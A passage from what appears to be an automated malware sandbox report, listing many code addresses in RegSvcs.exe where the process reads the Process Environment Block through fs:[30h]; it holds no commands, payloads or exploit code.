                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013727ED mov eax, dword ptr fs:[00000030h]4_2_013727ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013727ED mov eax, dword ptr fs:[00000030h]4_2_013727ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013DE7E1 mov eax, dword ptr fs:[00000030h]4_2_013DE7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135C7C0 mov eax, dword ptr fs:[00000030h]4_2_0135C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D07C3 mov eax, dword ptr fs:[00000030h]4_2_013D07C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136E627 mov eax, dword ptr fs:[00000030h]4_2_0136E627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01386620 mov eax, dword ptr fs:[00000030h]4_2_01386620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01388620 mov eax, dword ptr fs:[00000030h]4_2_01388620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135262C mov eax, dword ptr fs:[00000030h]4_2_0135262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392619 mov eax, dword ptr fs:[00000030h]4_2_01392619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141866E mov eax, dword ptr fs:[00000030h]4_2_0141866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141866E mov eax, dword ptr fs:[00000030h]4_2_0141866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CE609 mov eax, dword ptr fs:[00000030h]4_2_013CE609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]4_2_0136260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]4_2_0136260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]4_2_0136260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]4_2_0136260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]4_2_0136260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]4_2_0136260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136260B mov eax, dword ptr fs:[00000030h]4_2_0136260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01382674 mov eax, dword ptr fs:[00000030h]4_2_01382674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138A660 mov eax, dword ptr fs:[00000030h]4_2_0138A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138A660 mov eax, dword ptr fs:[00000030h]4_2_0138A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136C640 mov eax, dword ptr fs:[00000030h]4_2_0136C640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013866B0 mov eax, dword ptr fs:[00000030h]4_2_013866B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138C6A6 mov eax, dword ptr fs:[00000030h]4_2_0138C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01354690 mov eax, dword ptr fs:[00000030h]4_2_01354690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01354690 mov eax, dword ptr fs:[00000030h]4_2_01354690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D06F1 mov eax, dword ptr fs:[00000030h]4_2_013D06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D06F1 mov eax, dword ptr fs:[00000030h]4_2_013D06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]4_2_013CE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]4_2_013CE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]4_2_013CE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]4_2_013CE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0138A6C7 mov ebx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0138A6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013E892B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D892A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01348918 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01348918 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013DC912 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013CE908 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013CE908 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013DC97C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F4978 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F4978 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01376962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01376962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01376962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0139096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0139096E mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0139096E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D0946 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D89B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D89B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0141A9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013509AD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013509AD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013829F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013829F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013DE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013849D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013E69C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01372835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F483A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F483A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0138A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013DC810 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013E6870 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013E6870 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013DE872 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013DE872 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01380854 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01354859 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01354859 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01362840 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013DC89D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0141A8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01350887 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0138C8F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0138C8F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0137E8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0141AB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0137EB20 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0137EB20 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0134CB7E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01418B28 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01418B28 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F8B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013E6B40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013E6B40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01360BBE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01360BBE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01358BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01358BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01358BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0137EBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013DCBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013FEBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01350BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01350BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01350BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01370BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01370BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01370BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0138CA38 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01374A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01374A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0137EA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0138CA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013DCA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013CCA72 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013CCA72 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0138CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0138CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0138CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01360A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01360A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01358AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01358AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013A6AA4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01388A90 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01424A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0138AAEE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0138AAEE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01350AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01384AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01384AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013A6ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013A6ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013A6ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D8D20 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01346D10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01346D10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01346D10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01384D1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0136AD00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0136AD00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0136AD00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01408D10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01408D10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013E8D6B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01358D59 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01358D59 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01358D59 mov eax, dword ptr fs:[00000030h]
